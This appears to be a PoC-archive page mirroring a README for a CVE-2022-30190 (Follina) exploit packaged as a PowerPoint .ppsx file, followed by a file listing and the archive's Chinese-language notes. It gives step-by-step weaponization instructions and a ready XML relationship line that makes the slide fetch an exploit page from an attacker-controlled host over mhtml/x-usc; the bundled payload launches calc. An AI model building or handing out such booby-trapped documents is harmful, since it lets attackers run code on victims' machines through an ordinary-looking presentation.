关联漏洞
描述
This is exploit of CVE-2022-30190 on PowerPoint.
介绍
# CVE-2022-30190_EXP_PowerPoint
This is exploit of CVE-2022-30190 on PowerPoint.
Modify the suffix of the file to 'zip' and unzip the file, you can edit `\ppt\slides\_rels\slide1.xml.rels` and replace to your vps ip:port like this, then compress them as the same way and change the suffix to 'ppsx'. The default payload in 'exploit.html' is to execute the `calc`.
```
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>
```
refer: https://github.com/chvancooten/follina.py
文件快照
[4.0K] /data/pocs/d5e8bea5a5359f9f4342a2a7960efd73f9ea3bfd
├── [ 35K] CVE-2022-30190.ppsx
├── [5.2K] exploit.html
└── [ 665] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。